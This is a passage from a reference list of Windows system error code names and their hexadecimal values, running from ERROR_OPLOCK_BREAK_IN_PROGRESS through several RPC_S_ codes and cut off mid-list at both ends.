ERROR_OPLOCK_BREAK_IN_PROGRESS = 0x02E6 - ERROR_VOLUME_MOUNTED = 0x02E7 - ERROR_RXACT_COMMITTED = 0x02E8 - ERROR_NOTIFY_CLEANUP = 0x02E9 - ERROR_PRIMARY_TRANSPORT_CONNECT_FAILED = 0x02EA - ERROR_PAGE_FAULT_TRANSITION = 0x02EB - ERROR_PAGE_FAULT_DEMAND_ZERO = 0x02EC - ERROR_PAGE_FAULT_COPY_ON_WRITE = 0x02ED - ERROR_PAGE_FAULT_GUARD_PAGE = 0x02EE - ERROR_PAGE_FAULT_PAGING_FILE = 0x02EF - ERROR_CACHE_PAGE_LOCKED = 0x02F0 - ERROR_CRASH_DUMP = 0x02F1 - ERROR_BUFFER_ALL_ZEROS = 0x02F2 - ERROR_REPARSE_OBJECT = 0x02F3 - ERROR_RESOURCE_REQUIREMENTS_CHANGED = 0x02F4 - ERROR_TRANSLATION_COMPLETE = 0x02F5 - ERROR_NOTHING_TO_TERMINATE = 0x02F6 - ERROR_PROCESS_NOT_IN_JOB = 0x02F7 - ERROR_PROCESS_IN_JOB = 0x02F8 - ERROR_VOLSNAP_HIBERNATE_READY = 0x02F9 - ERROR_FSFILTER_OP_COMPLETED_SUCCESSFULLY = 0x02FA - ERROR_INTERRUPT_VECTOR_ALREADY_CONNECTED = 0x02FB - ERROR_INTERRUPT_STILL_CONNECTED = 0x02FC - ERROR_WAIT_FOR_OPLOCK = 0x02FD - ERROR_DBG_EXCEPTION_HANDLED = 0x02FE - ERROR_DBG_CONTINUE = 0x02FF - ERROR_CALLBACK_POP_STACK = 0x0300 - ERROR_COMPRESSION_DISABLED = 0x0301 - ERROR_CANTFETCHBACKWARDS = 0x0302 - ERROR_CANTSCROLLBACKWARDS = 0x0303 - ERROR_ROWSNOTRELEASED = 0x0304 - ERROR_BAD_ACCESSOR_FLAGS = 0x0305 - ERROR_ERRORS_ENCOUNTERED = 0x0306 - ERROR_NOT_CAPABLE = 0x0307 - ERROR_REQUEST_OUT_OF_SEQUENCE = 0x0308 - ERROR_VERSION_PARSE_ERROR = 0x0309 - ERROR_BADSTARTPOSITION = 0x030A - ERROR_MEMORY_HARDWARE = 0x030B - ERROR_DISK_REPAIR_DISABLED = 0x030C - ERROR_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE = 0x030D - ERROR_SYSTEM_POWERSTATE_TRANSITION = 0x030E - ERROR_SYSTEM_POWERSTATE_COMPLEX_TRANSITION = 0x030F - ERROR_MCA_EXCEPTION = 0x0310 - ERROR_ACCESS_AUDIT_BY_POLICY = 0x0311 - ERROR_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0x0312 - ERROR_ABANDON_HIBERFILE = 0x0313 - ERROR_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED = 0x0314 - ERROR_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR = 0x0315 - ERROR_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR = 0x0316 - ERROR_BAD_MCFG_TABLE = 0x0317 - ERROR_OPLOCK_SWITCHED_TO_NEW_HANDLE = 0x0320 - ERROR_CANNOT_GRANT_REQUESTED_OPLOCK = 0x0321 - ERROR_CANNOT_BREAK_OPLOCK = 0x0322 - ERROR_OPLOCK_HANDLE_CLOSED = 0x0323 - ERROR_NO_ACE_CONDITION = 0x0324 - ERROR_INVALID_ACE_CONDITION = 0x0325 - ERROR_EA_ACCESS_DENIED = 0x03E2 - ERROR_OPERATION_ABORTED = 0x03E3 - ERROR_IO_INCOMPLETE = 0x03E4 - ERROR_IO_PENDING = 0x03E5 - ERROR_NOACCESS = 0x03E6 - ERROR_SWAPERROR = 0x03E7 - ERROR_STACK_OVERFLOW = 0x03E9 - ERROR_INVALID_MESSAGE = 0x03EA - ERROR_CAN_NOT_COMPLETE = 0x03EB - ERROR_INVALID_FLAGS = 0x03EC - ERROR_UNRECOGNIZED_VOLUME = 0x03ED - ERROR_FILE_INVALID = 0x03EE - ERROR_FULLSCREEN_MODE = 0x03EF - ERROR_NO_TOKEN = 0x03F0 - ERROR_BADDB = 0x03F1 - ERROR_BADKEY = 0x03F2 - ERROR_CANTOPEN = 0x03F3 - ERROR_CANTREAD = 0x03F4 - ERROR_CANTWRITE = 0x03F5 - ERROR_REGISTRY_RECOVERED = 0x03F6 - ERROR_REGISTRY_CORRUPT = 0x03F7 - ERROR_REGISTRY_IO_FAILED = 0x03F8 - ERROR_NOT_REGISTRY_FILE = 0x03F9 - ERROR_KEY_DELETED = 0x03FA - ERROR_NO_LOG_SPACE = 0x03FB - ERROR_KEY_HAS_CHILDREN = 0x03FC - ERROR_CHILD_MUST_BE_VOLATILE = 0x03FD - ERROR_NOTIFY_ENUM_DIR = 0x03FE - ERROR_DEPENDENT_SERVICES_RUNNING = 0x041B - ERROR_INVALID_SERVICE_CONTROL = 0x041C - ERROR_SERVICE_REQUEST_TIMEOUT = 0x041D - ERROR_SERVICE_NO_THREAD = 0x041E - ERROR_SERVICE_DATABASE_LOCKED = 0x041F - ERROR_SERVICE_ALREADY_RUNNING = 0x0420 - ERROR_INVALID_SERVICE_ACCOUNT = 0x0421 - ERROR_SERVICE_DISABLED = 0x0422 - ERROR_CIRCULAR_DEPENDENCY = 0x0423 - ERROR_SERVICE_DOES_NOT_EXIST = 0x0424 - ERROR_SERVICE_CANNOT_ACCEPT_CTRL = 0x0425 - ERROR_SERVICE_NOT_ACTIVE = 0x0426 - ERROR_FAILED_SERVICE_CONTROLLER_CONNECT = 0x0427 - ERROR_EXCEPTION_IN_SERVICE = 0x0428 - ERROR_DATABASE_DOES_NOT_EXIST = 0x0429 - ERROR_SERVICE_SPECIFIC_ERROR = 0x042A - ERROR_PROCESS_ABORTED = 0x042B - ERROR_SERVICE_DEPENDENCY_FAIL = 0x042C - ERROR_SERVICE_LOGON_FAILED = 0x042D - ERROR_SERVICE_START_HANG = 0x042E - ERROR_INVALID_SERVICE_LOCK = 0x042F - ERROR_SERVICE_MARKED_FOR_DELETE = 0x0430 - ERROR_SERVICE_EXISTS = 0x0431 - ERROR_ALREADY_RUNNING_LKG = 0x0432 - ERROR_SERVICE_DEPENDENCY_DELETED = 0x0433 - ERROR_BOOT_ALREADY_ACCEPTED = 0x0434 - ERROR_SERVICE_NEVER_STARTED = 0x0435 - ERROR_DUPLICATE_SERVICE_NAME = 0x0436 - ERROR_DIFFERENT_SERVICE_ACCOUNT = 0x0437 - ERROR_CANNOT_DETECT_DRIVER_FAILURE = 0x0438 - ERROR_CANNOT_DETECT_PROCESS_ABORT = 0x0439 - ERROR_NO_RECOVERY_PROGRAM = 0x043A - ERROR_SERVICE_NOT_IN_EXE = 0x043B - ERROR_NOT_SAFEBOOT_SERVICE = 0x043C - ERROR_END_OF_MEDIA = 0x044C - ERROR_FILEMARK_DETECTED = 0x044D - ERROR_BEGINNING_OF_MEDIA = 0x044E - ERROR_SETMARK_DETECTED = 0x044F - ERROR_NO_DATA_DETECTED = 0x0450 - ERROR_PARTITION_FAILURE = 0x0451 - ERROR_INVALID_BLOCK_LENGTH = 0x0452 - ERROR_DEVICE_NOT_PARTITIONED = 0x0453 - ERROR_UNABLE_TO_LOCK_MEDIA = 0x0454 - ERROR_UNABLE_TO_UNLOAD_MEDIA = 0x0455 - ERROR_MEDIA_CHANGED = 0x0456 - ERROR_BUS_RESET = 0x0457 - ERROR_NO_MEDIA_IN_DRIVE = 0x0458 - ERROR_NO_UNICODE_TRANSLATION = 0x0459 - ERROR_DLL_INIT_FAILED = 0x045A - ERROR_SHUTDOWN_IN_PROGRESS = 0x045B - ERROR_NO_SHUTDOWN_IN_PROGRESS = 0x045C - ERROR_IO_DEVICE = 0x045D - ERROR_SERIAL_NO_DEVICE = 0x045E - ERROR_IRQ_BUSY = 0x045F - ERROR_MORE_WRITES = 0x0460 - ERROR_COUNTER_TIMEOUT = 0x0461 - ERROR_FLOPPY_ID_MARK_NOT_FOUND = 0x0462 - ERROR_FLOPPY_WRONG_CYLINDER = 0x0463 - ERROR_FLOPPY_UNKNOWN_ERROR = 0x0464 - ERROR_FLOPPY_BAD_REGISTERS = 0x0465 - ERROR_DISK_RECALIBRATE_FAILED = 0x0466 - ERROR_DISK_OPERATION_FAILED = 0x0467 - ERROR_DISK_RESET_FAILED = 0x0468 - ERROR_EOM_OVERFLOW = 0x0469 - ERROR_NOT_ENOUGH_SERVER_MEMORY = 0x046A - ERROR_POSSIBLE_DEADLOCK = 0x046B - ERROR_MAPPED_ALIGNMENT = 0x046C - ERROR_SET_POWER_STATE_VETOED = 0x0474 - ERROR_SET_POWER_STATE_FAILED = 0x0475 - ERROR_TOO_MANY_LINKS = 0x0476 - ERROR_OLD_WIN_VERSION = 0x047E - ERROR_APP_WRONG_OS = 0x047F - ERROR_SINGLE_INSTANCE_APP = 0x0480 - ERROR_RMODE_APP = 0x0481 - ERROR_INVALID_DLL = 0x0482 - ERROR_NO_ASSOCIATION = 0x0483 - ERROR_DDE_FAIL = 0x0484 - ERROR_DLL_NOT_FOUND = 0x0485 - ERROR_NO_MORE_USER_HANDLES = 0x0486 - ERROR_MESSAGE_SYNC_ONLY = 0x0487 - ERROR_SOURCE_ELEMENT_EMPTY = 0x0488 - ERROR_DESTINATION_ELEMENT_FULL = 0x0489 - ERROR_ILLEGAL_ELEMENT_ADDRESS = 0x048A - ERROR_MAGAZINE_NOT_PRESENT = 0x048B - ERROR_DEVICE_REINITIALIZATION_NEEDED = 0x048C - ERROR_DEVICE_REQUIRES_CLEANING = 0x048D - ERROR_DEVICE_DOOR_OPEN = 0x048E - ERROR_DEVICE_NOT_CONNECTED = 0x048F - ERROR_NOT_FOUND = 0x0490 - ERROR_NO_MATCH = 0x0491 - ERROR_SET_NOT_FOUND = 0x0492 - ERROR_POINT_NOT_FOUND = 0x0493 - ERROR_NO_TRACKING_SERVICE = 0x0494 - ERROR_NO_VOLUME_ID = 0x0495 - ERROR_UNABLE_TO_REMOVE_REPLACED = 0x0497 - ERROR_UNABLE_TO_MOVE_REPLACEMENT = 0x0498 - ERROR_UNABLE_TO_MOVE_REPLACEMENT_2 = 0x0499 - ERROR_JOURNAL_DELETE_IN_PROGRESS = 0x049A - ERROR_JOURNAL_NOT_ACTIVE = 0x049B - ERROR_POTENTIAL_FILE_FOUND = 0x049C - ERROR_JOURNAL_ENTRY_DELETED = 0x049D - ERROR_SHUTDOWN_IS_SCHEDULED = 0x04A6 - ERROR_SHUTDOWN_USERS_LOGGED_ON = 0x04A7 - ERROR_BAD_DEVICE = 0x04B0 - ERROR_CONNECTION_UNAVAIL = 0x04B1 - ERROR_DEVICE_ALREADY_REMEMBERED = 0x04B2 - ERROR_NO_NET_OR_BAD_PATH = 0x04B3 - ERROR_BAD_PROVIDER = 0x04B4 - ERROR_CANNOT_OPEN_PROFILE = 0x04B5 - ERROR_BAD_PROFILE = 0x04B6 - ERROR_NOT_CONTAINER = 0x04B7 - ERROR_EXTENDED_ERROR = 0x04B8 - ERROR_INVALID_GROUPNAME = 0x04B9 - ERROR_INVALID_COMPUTERNAME = 0x04BA - ERROR_INVALID_EVENTNAME = 0x04BB - ERROR_INVALID_DOMAINNAME = 0x04BC - ERROR_INVALID_SERVICENAME = 0x04BD - ERROR_INVALID_NETNAME = 0x04BE - ERROR_INVALID_SHARENAME = 0x04BF - ERROR_INVALID_PASSWORDNAME = 0x04C0 - ERROR_INVALID_MESSAGENAME = 0x04C1 - ERROR_INVALID_MESSAGEDEST = 0x04C2 - ERROR_SESSION_CREDENTIAL_CONFLICT = 0x04C3 - ERROR_REMOTE_SESSION_LIMIT_EXCEEDED = 0x04C4 - ERROR_DUP_DOMAINNAME = 0x04C5 - ERROR_NO_NETWORK = 0x04C6 - ERROR_CANCELLED = 0x04C7 - ERROR_USER_MAPPED_FILE = 0x04C8 - ERROR_CONNECTION_REFUSED = 0x04C9 - ERROR_GRACEFUL_DISCONNECT = 0x04CA - ERROR_ADDRESS_ALREADY_ASSOCIATED = 0x04CB - ERROR_ADDRESS_NOT_ASSOCIATED = 0x04CC - ERROR_CONNECTION_INVALID = 0x04CD - ERROR_CONNECTION_ACTIVE = 0x04CE - ERROR_NETWORK_UNREACHABLE = 0x04CF - ERROR_HOST_UNREACHABLE = 0x04D0 - ERROR_PROTOCOL_UNREACHABLE = 0x04D1 - ERROR_PORT_UNREACHABLE = 0x04D2 - ERROR_REQUEST_ABORTED = 0x04D3 - ERROR_CONNECTION_ABORTED = 0x04D4 - ERROR_RETRY = 0x04D5 - ERROR_CONNECTION_COUNT_LIMIT = 0x04D6 - ERROR_LOGIN_TIME_RESTRICTION = 0x04D7 - ERROR_LOGIN_WKSTA_RESTRICTION = 0x04D8 - ERROR_INCORRECT_ADDRESS = 0x04D9 - ERROR_ALREADY_REGISTERED = 0x04DA - ERROR_SERVICE_NOT_FOUND = 0x04DB - ERROR_NOT_AUTHENTICATED = 0x04DC - ERROR_NOT_LOGGED_ON = 0x04DD - ERROR_CONTINUE = 0x04DE - ERROR_ALREADY_INITIALIZED = 0x04DF - ERROR_NO_MORE_DEVICES = 0x04E0 - ERROR_NO_SUCH_SITE = 0x04E1 - ERROR_DOMAIN_CONTROLLER_EXISTS = 0x04E2 - ERROR_ONLY_IF_CONNECTED = 0x04E3 - ERROR_OVERRIDE_NOCHANGES = 0x04E4 - ERROR_BAD_USER_PROFILE = 0x04E5 - ERROR_NOT_SUPPORTED_ON_SBS = 0x04E6 - ERROR_SERVER_SHUTDOWN_IN_PROGRESS = 0x04E7 - ERROR_HOST_DOWN = 0x04E8 - ERROR_NON_ACCOUNT_SID = 0x04E9 - ERROR_NON_DOMAIN_SID = 0x04EA - ERROR_APPHELP_BLOCK = 0x04EB - ERROR_ACCESS_DISABLED_BY_POLICY = 0x04EC - ERROR_REG_NAT_CONSUMPTION = 0x04ED - ERROR_CSCSHARE_OFFLINE = 0x04EE - ERROR_PKINIT_FAILURE = 0x04EF - ERROR_SMARTCARD_SUBSYSTEM_FAILURE = 0x04F0 - ERROR_DOWNGRADE_DETECTED = 0x04F1 - ERROR_MACHINE_LOCKED = 0x04F7 - ERROR_CALLBACK_SUPPLIED_INVALID_DATA = 0x04F9 - ERROR_SYNC_FOREGROUND_REFRESH_REQUIRED = 0x04FA - ERROR_DRIVER_BLOCKED = 0x04FB - ERROR_INVALID_IMPORT_OF_NON_DLL = 0x04FC - ERROR_ACCESS_DISABLED_WEBBLADE = 0x04FD - ERROR_ACCESS_DISABLED_WEBBLADE_TAMPER = 0x04FE - ERROR_RECOVERY_FAILURE = 0x04FF - ERROR_ALREADY_FIBER = 0x0500 - ERROR_ALREADY_THREAD = 0x0501 - ERROR_STACK_BUFFER_OVERRUN = 0x0502 - ERROR_PARAMETER_QUOTA_EXCEEDED = 0x0503 - ERROR_DEBUGGER_INACTIVE = 0x0504 - ERROR_DELAY_LOAD_FAILED = 0x0505 - ERROR_VDM_DISALLOWED = 0x0506 - ERROR_UNIDENTIFIED_ERROR = 0x0507 - ERROR_INVALID_CRUNTIME_PARAMETER = 0x0508 - ERROR_BEYOND_VDL = 0x0509 - ERROR_INCOMPATIBLE_SERVICE_SID_TYPE = 0x050A - ERROR_DRIVER_PROCESS_TERMINATED = 0x050B - ERROR_IMPLEMENTATION_LIMIT = 0x050C - ERROR_PROCESS_IS_PROTECTED = 0x050D - ERROR_SERVICE_NOTIFY_CLIENT_LAGGING = 0x050E - ERROR_DISK_QUOTA_EXCEEDED = 0x050F - ERROR_CONTENT_BLOCKED = 0x0510 - ERROR_INCOMPATIBLE_SERVICE_PRIVILEGE = 0x0511 - ERROR_INVALID_LABEL = 0x0513 - ERROR_NOT_ALL_ASSIGNED = 0x0514 - ERROR_SOME_NOT_MAPPED = 0x0515 - ERROR_NO_QUOTAS_FOR_ACCOUNT = 0x0516 - ERROR_LOCAL_USER_SESSION_KEY = 0x0517 - ERROR_NULL_LM_PASSWORD = 0x0518 - ERROR_UNKNOWN_REVISION = 0x0519 - ERROR_REVISION_MISMATCH = 0x051A - ERROR_INVALID_OWNER = 0x051B - ERROR_INVALID_PRIMARY_GROUP = 0x051C - ERROR_NO_IMPERSONATION_TOKEN = 0x051D - ERROR_CANT_DISABLE_MANDATORY = 0x051E - ERROR_NO_LOGON_SERVERS = 0x051F - ERROR_NO_SUCH_LOGON_SESSION = 0x0520 - ERROR_NO_SUCH_PRIVILEGE = 0x0521 - ERROR_PRIVILEGE_NOT_HELD = 0x0522 - ERROR_INVALID_ACCOUNT_NAME = 0x0523 - ERROR_USER_EXISTS = 0x0524 - ERROR_NO_SUCH_USER = 0x0525 - ERROR_GROUP_EXISTS = 0x0526 - ERROR_NO_SUCH_GROUP = 0x0527 - ERROR_MEMBER_IN_GROUP = 0x0528 - ERROR_MEMBER_NOT_IN_GROUP = 0x0529 - ERROR_LAST_ADMIN = 0x052A - ERROR_WRONG_PASSWORD = 0x052B - ERROR_ILL_FORMED_PASSWORD = 0x052C - ERROR_PASSWORD_RESTRICTION = 0x052D - ERROR_LOGON_FAILURE = 0x052E - ERROR_ACCOUNT_RESTRICTION = 0x052F - ERROR_INVALID_LOGON_HOURS = 0x0530 - ERROR_INVALID_WORKSTATION = 0x0531 - ERROR_PASSWORD_EXPIRED = 0x0532 - ERROR_ACCOUNT_DISABLED = 0x0533 - ERROR_NONE_MAPPED = 0x0534 - ERROR_TOO_MANY_LUIDS_REQUESTED = 0x0535 - ERROR_LUIDS_EXHAUSTED = 0x0536 - ERROR_INVALID_SUB_AUTHORITY = 0x0537 - ERROR_INVALID_ACL = 0x0538 - ERROR_INVALID_SID = 0x0539 - ERROR_INVALID_SECURITY_DESCR = 0x053A - ERROR_BAD_INHERITANCE_ACL = 0x053C - ERROR_SERVER_DISABLED = 0x053D - ERROR_SERVER_NOT_DISABLED = 0x053E - ERROR_INVALID_ID_AUTHORITY = 0x053F - ERROR_ALLOTTED_SPACE_EXCEEDED = 0x0540 - ERROR_INVALID_GROUP_ATTRIBUTES = 0x0541 - ERROR_BAD_IMPERSONATION_LEVEL = 0x0542 - ERROR_CANT_OPEN_ANONYMOUS = 0x0543 - ERROR_BAD_VALIDATION_CLASS = 0x0544 - ERROR_BAD_TOKEN_TYPE = 0x0545 - ERROR_NO_SECURITY_ON_OBJECT = 0x0546 - ERROR_CANT_ACCESS_DOMAIN_INFO = 0x0547 - ERROR_INVALID_SERVER_STATE = 0x0548 - ERROR_INVALID_DOMAIN_STATE = 0x0549 - ERROR_INVALID_DOMAIN_ROLE = 0x054A - ERROR_NO_SUCH_DOMAIN = 0x054B - ERROR_DOMAIN_EXISTS = 0x054C - ERROR_DOMAIN_LIMIT_EXCEEDED = 0x054D - ERROR_INTERNAL_DB_CORRUPTION = 0x054E - ERROR_INTERNAL_ERROR = 0x054F - ERROR_GENERIC_NOT_MAPPED = 0x0550 - ERROR_BAD_DESCRIPTOR_FORMAT = 0x0551 - ERROR_NOT_LOGON_PROCESS = 0x0552 - ERROR_LOGON_SESSION_EXISTS = 0x0553 - ERROR_NO_SUCH_PACKAGE = 0x0554 - ERROR_BAD_LOGON_SESSION_STATE = 0x0555 - ERROR_LOGON_SESSION_COLLISION = 0x0556 - ERROR_INVALID_LOGON_TYPE = 0x0557 - ERROR_CANNOT_IMPERSONATE = 0x0558 - ERROR_RXACT_INVALID_STATE = 0x0559 - ERROR_RXACT_COMMIT_FAILURE = 0x055A - ERROR_SPECIAL_ACCOUNT = 0x055B - ERROR_SPECIAL_GROUP = 0x055C - ERROR_SPECIAL_USER = 0x055D - ERROR_MEMBERS_PRIMARY_GROUP = 0x055E - ERROR_TOKEN_ALREADY_IN_USE = 0x055F - ERROR_NO_SUCH_ALIAS = 0x0560 - ERROR_MEMBER_NOT_IN_ALIAS = 0x0561 - ERROR_MEMBER_IN_ALIAS = 0x0562 - ERROR_ALIAS_EXISTS = 0x0563 - ERROR_LOGON_NOT_GRANTED = 0x0564 - ERROR_TOO_MANY_SECRETS = 0x0565 - ERROR_SECRET_TOO_LONG = 0x0566 - ERROR_INTERNAL_DB_ERROR = 0x0567 - ERROR_TOO_MANY_CONTEXT_IDS = 0x0568 - ERROR_LOGON_TYPE_NOT_GRANTED = 0x0569 - ERROR_NT_CROSS_ENCRYPTION_REQUIRED = 0x056A - ERROR_NO_SUCH_MEMBER = 0x056B - ERROR_INVALID_MEMBER = 0x056C - ERROR_TOO_MANY_SIDS = 0x056D - ERROR_LM_CROSS_ENCRYPTION_REQUIRED = 0x056E - ERROR_NO_INHERITANCE = 0x056F - ERROR_FILE_CORRUPT = 0x0570 - ERROR_DISK_CORRUPT = 0x0571 - ERROR_NO_USER_SESSION_KEY = 0x0572 - ERROR_LICENSE_QUOTA_EXCEEDED = 0x0573 - ERROR_WRONG_TARGET_NAME = 0x0574 - ERROR_MUTUAL_AUTH_FAILED = 0x0575 - ERROR_TIME_SKEW = 0x0576 - ERROR_CURRENT_DOMAIN_NOT_ALLOWED = 0x0577 - ERROR_INVALID_WINDOW_HANDLE = 0x0578 - ERROR_INVALID_MENU_HANDLE = 0x0579 - ERROR_INVALID_CURSOR_HANDLE = 0x057A - ERROR_INVALID_ACCEL_HANDLE = 0x057B - ERROR_INVALID_HOOK_HANDLE = 0x057C - ERROR_INVALID_DWP_HANDLE = 0x057D - ERROR_TLW_WITH_WSCHILD = 0x057E - ERROR_CANNOT_FIND_WND_CLASS = 0x057F - ERROR_WINDOW_OF_OTHER_THREAD = 0x0580 - ERROR_HOTKEY_ALREADY_REGISTERED = 0x0581 - ERROR_CLASS_ALREADY_EXISTS = 0x0582 - ERROR_CLASS_DOES_NOT_EXIST = 0x0583 - ERROR_CLASS_HAS_WINDOWS = 0x0584 - ERROR_INVALID_INDEX = 0x0585 - ERROR_INVALID_ICON_HANDLE = 0x0586 - ERROR_PRIVATE_DIALOG_INDEX = 0x0587 - ERROR_LISTBOX_ID_NOT_FOUND = 0x0588 - ERROR_NO_WILDCARD_CHARACTERS = 0x0589 - ERROR_CLIPBOARD_NOT_OPEN = 0x058A - ERROR_HOTKEY_NOT_REGISTERED = 0x058B - ERROR_WINDOW_NOT_DIALOG = 0x058C - ERROR_CONTROL_ID_NOT_FOUND = 0x058D - ERROR_INVALID_COMBOBOX_MESSAGE = 0x058E - ERROR_WINDOW_NOT_COMBOBOX = 0x058F - ERROR_INVALID_EDIT_HEIGHT = 0x0590 - ERROR_DC_NOT_FOUND = 0x0591 - ERROR_INVALID_HOOK_FILTER = 0x0592 - ERROR_INVALID_FILTER_PROC = 0x0593 - ERROR_HOOK_NEEDS_HMOD = 0x0594 - ERROR_GLOBAL_ONLY_HOOK = 0x0595 - ERROR_JOURNAL_HOOK_SET = 0x0596 - ERROR_HOOK_NOT_INSTALLED = 0x0597 - ERROR_INVALID_LB_MESSAGE = 0x0598 - ERROR_SETCOUNT_ON_BAD_LB = 0x0599 - ERROR_LB_WITHOUT_TABSTOPS = 0x059A - ERROR_DESTROY_OBJECT_OF_OTHER_THREAD = 0x059B - ERROR_CHILD_WINDOW_MENU = 0x059C - ERROR_NO_SYSTEM_MENU = 0x059D - ERROR_INVALID_MSGBOX_STYLE = 0x059E - ERROR_INVALID_SPI_VALUE = 0x059F - ERROR_SCREEN_ALREADY_LOCKED = 0x05A0 - ERROR_HWNDS_HAVE_DIFF_PARENT = 0x05A1 - ERROR_NOT_CHILD_WINDOW = 0x05A2 - ERROR_INVALID_GW_COMMAND = 0x05A3 - ERROR_INVALID_THREAD_ID = 0x05A4 - ERROR_NON_MDICHILD_WINDOW = 0x05A5 - ERROR_POPUP_ALREADY_ACTIVE = 0x05A6 - ERROR_NO_SCROLLBARS = 0x05A7 - ERROR_INVALID_SCROLLBAR_RANGE = 0x05A8 - ERROR_INVALID_SHOWWIN_COMMAND = 0x05A9 - ERROR_NO_SYSTEM_RESOURCES = 0x05AA - ERROR_NONPAGED_SYSTEM_RESOURCES = 0x05AB - ERROR_PAGED_SYSTEM_RESOURCES = 0x05AC - ERROR_WORKING_SET_QUOTA = 0x05AD - ERROR_PAGEFILE_QUOTA = 0x05AE - ERROR_COMMITMENT_LIMIT = 0x05AF - ERROR_MENU_ITEM_NOT_FOUND = 0x05B0 - ERROR_INVALID_KEYBOARD_HANDLE = 0x05B1 - ERROR_HOOK_TYPE_NOT_ALLOWED = 0x05B2 - ERROR_REQUIRES_INTERACTIVE_WINDOWSTATION = 0x05B3 - ERROR_TIMEOUT = 0x05B4 - ERROR_INVALID_MONITOR_HANDLE = 0x05B5 - ERROR_INCORRECT_SIZE = 0x05B6 - ERROR_SYMLINK_CLASS_DISABLED = 0x05B7 - ERROR_SYMLINK_NOT_SUPPORTED = 0x05B8 - ERROR_XML_PARSE_ERROR = 0x05B9 - ERROR_XMLDSIG_ERROR = 0x05BA - ERROR_RESTART_APPLICATION = 0x05BB - ERROR_WRONG_COMPARTMENT = 0x05BC - ERROR_AUTHIP_FAILURE = 0x05BD - ERROR_NO_NVRAM_RESOURCES = 0x05BE - ERROR_EVENTLOG_FILE_CORRUPT = 0x05DC - ERROR_EVENTLOG_CANT_START = 0x05DD - ERROR_LOG_FILE_FULL = 0x05DE - ERROR_EVENTLOG_FILE_CHANGED = 0x05DF - ERROR_INVALID_TASK_NAME = 0x060E - ERROR_INVALID_TASK_INDEX = 0x060F - ERROR_THREAD_ALREADY_IN_TASK = 0x0610 - ERROR_INSTALL_SERVICE_FAILURE = 0x0641 - ERROR_INSTALL_USEREXIT = 0x0642 - ERROR_INSTALL_FAILURE = 0x0643 - ERROR_INSTALL_SUSPEND = 0x0644 - ERROR_UNKNOWN_PRODUCT = 0x0645 - ERROR_UNKNOWN_FEATURE = 0x0646 - ERROR_UNKNOWN_COMPONENT = 0x0647 - ERROR_UNKNOWN_PROPERTY = 0x0648 - ERROR_INVALID_HANDLE_STATE = 0x0649 - ERROR_BAD_CONFIGURATION = 0x064A - ERROR_INDEX_ABSENT = 0x064B - ERROR_INSTALL_SOURCE_ABSENT = 0x064C - ERROR_INSTALL_PACKAGE_VERSION = 0x064D - ERROR_PRODUCT_UNINSTALLED = 0x064E - ERROR_BAD_QUERY_SYNTAX = 0x064F - ERROR_INVALID_FIELD = 0x0650 - ERROR_DEVICE_REMOVED = 0x0651 - ERROR_INSTALL_ALREADY_RUNNING = 0x0652 - ERROR_INSTALL_PACKAGE_OPEN_FAILED = 0x0653 - ERROR_INSTALL_PACKAGE_INVALID = 0x0654 - ERROR_INSTALL_UI_FAILURE = 0x0655 - ERROR_INSTALL_LOG_FAILURE = 0x0656 - ERROR_INSTALL_LANGUAGE_UNSUPPORTED = 0x0657 - ERROR_INSTALL_TRANSFORM_FAILURE = 0x0658 - ERROR_INSTALL_PACKAGE_REJECTED = 0x0659 - ERROR_FUNCTION_NOT_CALLED = 0x065A - ERROR_FUNCTION_FAILED = 0x065B - ERROR_INVALID_TABLE = 0x065C - ERROR_DATATYPE_MISMATCH = 0x065D - ERROR_UNSUPPORTED_TYPE = 0x065E - ERROR_CREATE_FAILED = 0x065F - ERROR_INSTALL_TEMP_UNWRITABLE = 0x0660 - ERROR_INSTALL_PLATFORM_UNSUPPORTED = 0x0661 - ERROR_INSTALL_NOTUSED = 0x0662 - ERROR_PATCH_PACKAGE_OPEN_FAILED = 0x0663 - ERROR_PATCH_PACKAGE_INVALID = 0x0664 - ERROR_PATCH_PACKAGE_UNSUPPORTED = 0x0665 - ERROR_PRODUCT_VERSION = 0x0666 - ERROR_INVALID_COMMAND_LINE = 0x0667 - ERROR_INSTALL_REMOTE_DISALLOWED = 0x0668 - ERROR_SUCCESS_REBOOT_INITIATED = 0x0669 - ERROR_PATCH_TARGET_NOT_FOUND = 0x066A - ERROR_PATCH_PACKAGE_REJECTED = 0x066B - ERROR_INSTALL_TRANSFORM_REJECTED = 0x066C - ERROR_INSTALL_REMOTE_PROHIBITED = 0x066D - ERROR_PATCH_REMOVAL_UNSUPPORTED = 0x066E - ERROR_UNKNOWN_PATCH = 0x066F - ERROR_PATCH_NO_SEQUENCE = 0x0670 - ERROR_PATCH_REMOVAL_DISALLOWED = 0x0671 - ERROR_INVALID_PATCH_XML = 0x0672 - ERROR_PATCH_MANAGED_ADVERTISED_PRODUCT = 0x0673 - ERROR_INSTALL_SERVICE_SAFEBOOT = 0x0674 - ERROR_FAIL_FAST_EXCEPTION = 0x0675 - RPC_S_INVALID_STRING_BINDING = 0x06A4 - RPC_S_WRONG_KIND_OF_BINDING = 0x06A5 - RPC_S_INVALID_BINDING = 0x06A6 - RPC_S_PROTSEQ_NOT_SUPPORTED = 0x06A7 - RPC_S_INVALID_RPC_PROTSEQ = 0x06A8 - RPC_S_INVALID_STRING_UUID = 0x06A9 - RPC_S_INVALID_ENDPOINT_FORMAT = 0x06AA - RPC_S_INVALID_NET_ADDR = 0x06AB - RPC_S_NO_ENDPOINT_FOUND = 0x06AC - RPC_S_INVALID_TIMEOUT = 0x06AD - RPC_S_OBJECT_NOT_FOUND = 0x06AE - RPC_S_ALREADY_REGISTERED = 0x06AF - RPC_S_TYPE_ALREADY_REGISTERED = 0x06B0 - RPC_S_ALREADY_LISTENING = 0x06B1 - RPC_S_NO_PROTSEQS_REGISTERED = 0x06B2 - RPC_S_NOT_LISTENING = 0x06B3 - RPC_S_UNKNOWN_MGR_TYPE = 0x06B4 - RPC_S_UNKNOWN_IF = 0x06B5 - RPC_S_NO_BINDINGS = 0x06B6 - RPC_S_NO_PROTSEQS = 0x06B7 - RPC_S_CANT_CREATE_ENDPOINT = 0x06B8 - RPC_S_OUT_OF_RESOURCES = 0x06B9 - RPC_S_SERVER_UNAVAILABLE = 0x06BA - RPC_S_SERVER_TOO_BUSY = 0x06BB - RPC_S_INVALID_NETWORK_OPTIONS = 0x06BC - 